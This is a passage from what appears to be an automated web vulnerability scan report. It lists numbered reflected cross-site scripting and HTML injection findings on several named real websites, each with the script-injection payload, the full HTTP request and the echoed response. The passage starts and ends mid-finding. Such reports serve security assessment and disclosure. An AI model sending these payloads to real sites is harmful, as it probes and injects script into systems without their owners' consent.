Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111881

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dentalcrossing.com/?e0261"><script>alert(1)</script>118fbccd4ca=1">
...[SNIP]...

3.49. http://www.designingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.designingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77f8"><script>alert(1)</script>c45ddc233d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e77f8"><script>alert(1)</script>c45ddc233d5=1 HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=voh1qpdojh74kuvvl210bd7ti4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122755

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.designingcrossing.com/?e77f8"><script>alert(1)</script>c45ddc233d5=1">
...[SNIP]...

3.50. http://www.diversitycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.diversitycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536ad"><script>alert(1)</script>92d710e5331 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?536ad"><script>alert(1)</script>92d710e5331=1 HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mvngm9tnor0sktfdm2him70ht6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135910

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.diversitycrossing.com/?536ad"><script>alert(1)</script>92d710e5331=1">
...[SNIP]...

3.51. http://www.dotnetcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dotnetcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff65"><script>alert(1)</script>d0021da73b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5ff65"><script>alert(1)</script>d0021da73b5=1 HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tcm1i9njojb6ne685f4rk35d16; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111425

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dotnetcrossing.com/?5ff65"><script>alert(1)</script>d0021da73b5=1">
...[SNIP]...

3.52. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.dyn-web.com
Path:	/bus/terms.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed13c<a>aca04e604f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bused13c<a>aca04e604f5/terms.html HTTP/1.1
Host: www.dyn-web.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:34:47 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=f71522e635f566773a14ae500b4e2916; path=/
Connection: close
Content-Type: text/html
Content-Length: 5456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Page No
...[SNIP]...
<a>aca04e604f5/">Bused13c<a>aca04e604f5</a>
...[SNIP]...

3.53. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.dyn-web.com
Path:	/bus/terms.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a0a"><a>7585948a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bus60a0a"><a>7585948a4e/terms.html HTTP/1.1
Host: www.dyn-web.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:34:39 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=1089af8a8270c6f1de1622faa083f934; path=/
Connection: close
Content-Type: text/html
Content-Length: 5458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Page No
...[SNIP]...
<a href="/bus60a0a"><a>7585948a4e/">
...[SNIP]...

3.54. http://www.ecommercecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ecommercecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4aad"><script>alert(1)</script>8c4d139c8e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b4aad"><script>alert(1)</script>8c4d139c8e9=1 HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qgp06lth3p2j8damhlniukmo55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123070

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.ecommercecrossing.com/?b4aad"><script>alert(1)</script>8c4d139c8e9=1">
...[SNIP]...

3.55. http://www.editingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.editingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a2ad"><script>alert(1)</script>a026aea5f67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8a2ad"><script>alert(1)</script>a026aea5f67=1 HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=40ci97cu8vt0v2j4827q3o6no5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.editingcrossing.com/?8a2ad"><script>alert(1)</script>a026aea5f67=1">
...[SNIP]...

3.56. http://www.educationcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.educationcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53272"><script>alert(1)</script>8ec396783fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?53272"><script>alert(1)</script>8ec396783fa=1 HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.57. http://www.employmentcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.employmentcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d32"><script>alert(1)</script>3c4df51b6d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c9d32"><script>alert(1)</script>3c4df51b6d0=1 HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qagf6dbtbo4lqfkvatbk0434m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103836

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.employmentcrossing.com/?c9d32"><script>alert(1)</script>3c4df51b6d0=1">
...[SNIP]...

3.58. http://www.energycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.energycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8299"><script>alert(1)</script>be9f4647928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d8299"><script>alert(1)</script>be9f4647928=1 HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=noidta3npdj58s0aohjj586je3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117890

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.energycrossing.com/?d8299"><script>alert(1)</script>be9f4647928=1">
...[SNIP]...

3.59. http://www.engineeringcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.engineeringcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce7e"><script>alert(1)</script>f51101cb458 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ce7e"><script>alert(1)</script>f51101cb458=1 HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=aut4ejh39idf5up0qhelu1l544; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136570

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.engineeringcrossing.com/?2ce7e"><script>alert(1)</script>f51101cb458=1">
...[SNIP]...

3.60. http://www.entrylevelcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.entrylevelcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1390"><script>alert(1)</script>3782757edeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a1390"><script>alert(1)</script>3782757edeb=1 HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rvmtdhrtapom8nr77l4ajo2407; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149274

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.entrylevelcrossing.com/?a1390"><script>alert(1)</script>3782757edeb=1">
...[SNIP]...

3.61. http://www.environmentalcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.environmentalcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47df8"><script>alert(1)</script>9bba834dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?47df8"><script>alert(1)</script>9bba834dd35=1 HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:14 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q47km4obkvavliijoe7tgvqa65; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103948

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.environmentalcrossing.com/?47df8"><script>alert(1)</script>9bba834dd35=1">
...[SNIP]...

3.62. http://www.environmentalsafetyhealthcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.environmentalsafetyhealthcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccd0"><script>alert(1)</script>232068dd834 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ccd0"><script>alert(1)</script>232068dd834=1 HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0erqag1b3vhfvubgk4socfl113; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109501

